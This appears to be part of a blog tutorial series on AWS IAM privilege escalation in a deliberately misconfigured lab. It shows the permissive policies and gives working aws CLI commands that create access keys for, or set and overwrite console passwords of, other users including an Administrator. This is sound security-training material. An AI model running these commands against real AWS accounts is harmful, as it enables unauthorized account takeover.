Welcome back! Today's topic will be focusing on exploiting IAM permissions on other users, we'll dive into IAM-CreateAccessKey, IAM-CreateLoginProfile and IAM-UpdateLoginProfile. Don't be shy, feel free to contact me on LinkedIn or Twitter if you have any questions.
If you just jumped into my series I recommend starting at the beginning:
- Part 1 (setup and privesc1-CreateNewPolicyVersion)
- Part 2 (privesc2-SetExistingDefaultPolicyVersion and privesc3-CreateEC2WithExistingIP)
Let's get started!
privesc4-CreateAccessKey
The policy allows us access to CreateAccessKey which enables you to create access keys for arbitrary users using --user-name.
Version = "2012-10-17"
Statement = [
{
Action = "iam:CreateAccessKey"
Effect = "Allow"
Resource = "*"
},
]Exploitation is as simple as aws iam --profile privesc4 create-access-key --user-name Administrator. The response will provide you with access keys of the high-privileged administrator account. Now just define the credentials as a profile and start taking over the AWS account. ;-)
privesc5-CreateLoginProfile
As you know there are two ways how you can authenticate to AWS services, the first is traditional via email address and password on the management console, the second is via access keys. Using CreateLoginProfile you can create passwords for a specific IAM user to authenticate via the AWS management console.
Version = "2012-10-17"
Statement = [
{
Action = "iam:CreateLoginProfile"
Effect = "Allow"
Resource = "*"
},
]
You can just follow the AWS documentation for steps how to create the password:
aws iam --profile privesc5 create-login-profile --user-name privesc5-CreateLoginProfile-user --password "random_password"
Of course this only makes sense on a high-privileged account, to make it easier I just chose the privesc5 user. When you are done, you can log in on https://signin.aws.amazon.com/: select log in as a "IAM user" and keep your account number close, you'll need it.
Limitation: This only works if there's not already a login profile attached to the IAM user.
privesc6-UpdateLoginProfile
This time we only have access to iam:UpdateLoginProfile, but again, exploitation is as easy as just following the documentation for update-login-profile.
aws iam --profile privesc6 update-login-profile --user-name Administrator --password "random_password"
These ones were pretty simple, I'll dive into the more complex ones next but I wanted to cover them to show you that exploitation can be as simple as working by the documentation.